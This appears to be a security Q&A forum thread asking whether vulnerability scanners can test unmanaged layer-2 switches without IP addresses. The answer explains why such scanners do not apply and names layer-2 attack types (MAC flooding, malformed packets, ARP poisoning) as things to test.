The target switches do not have IP addresses and most scanners require IPs as targets.
Can you scan unmanaged switches with vulnerability scanners? What scanners can target layer 2?
Asked
Active
Viewed 664 times
1
-
1So, you are looking for a layer 2 scanner. Because you are looking for layer 2 devices, then your vulnerability scanning is almost unnecessary at this level. Any threat would have to be physically local to the device. Is that within your scope? – schroeder Dec 14 '18 at 10:45
1 Answers
4
The target switches do not have IP addresses and most scanners require IPs as targets.
Can you scan unmanaged switches with vulnerability scanners? What scanners can target layer 2?
It's useful to keep the OSI model in mind.
A unmanaged switch without IP solely operates on layer 2. It doesn't know about the higher layers, nor does it care. It looks up the destination MAC in it's table, and switches the packets accordingly. This is done in silicon.
Vulnerability scanners work on layers 4 and up, depending on what they target. For instance a vulnerability scanner looking for problems in Apache doesn't really care about anything else than the application.
Running such tools against an unmanaged switch is just a waste of time. You won't learn anything. Instead you should look at how the switch behaves if you do attacks targeted against L2 devices. Can you fill up the MAC table? Can you crash the switch by malformed packets? Can you do arp poisoning successfully?
That said: unmanaged switches are simple devices. They commonly do not have a general purpose CPU, and no code are running on such switches.
